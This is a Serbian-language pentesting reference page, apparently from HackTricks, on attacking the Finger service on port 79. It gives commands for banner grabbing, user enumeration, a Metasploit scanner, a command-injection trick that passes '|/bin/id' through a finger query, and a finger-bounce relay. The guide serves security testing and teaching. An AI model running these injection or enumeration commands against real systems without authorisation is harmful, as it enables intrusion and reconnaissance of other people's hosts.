57 lines
1.7 KiB
Markdown

# 79 - Pentesting Finger
{{#include ../banners/hacktricks-training.md}}
## **Osnovne informacije**
Program/usluga **Finger** se koristi za dobijanje detalja o korisnicima računara. Obično, informacije koje se pružaju uključuju **korisničko ime, puno ime**, i, u nekim slučajevima, dodatne detalje. Ovi dodatni detalji mogu obuhvatati lokaciju kancelarije i broj telefona (ako su dostupni), vreme kada se korisnik prijavio, period neaktivnosti (idle time), poslednji put kada je korisnik pročitao mail, i sadržaj korisnikovih planova i projektnih fajlova.
**Podrazumevani port:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Enumeracija**
### **Prikupljanje banera/Osnovna konekcija**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Enumeracija korisnika**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
Alternativno, možete koristiti **finger-user-enum** iz [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), neki primeri:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap izvršava skriptu za korišćenje podrazumevanih skripti**
### Metasploit koristi više trikova od Nmap-a
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
- `port:79 USER`
## Izvršenje komandi
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Finger Bounce
[Koristite sistem kao finger relé](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{{#include ../banners/hacktricks-training.md}}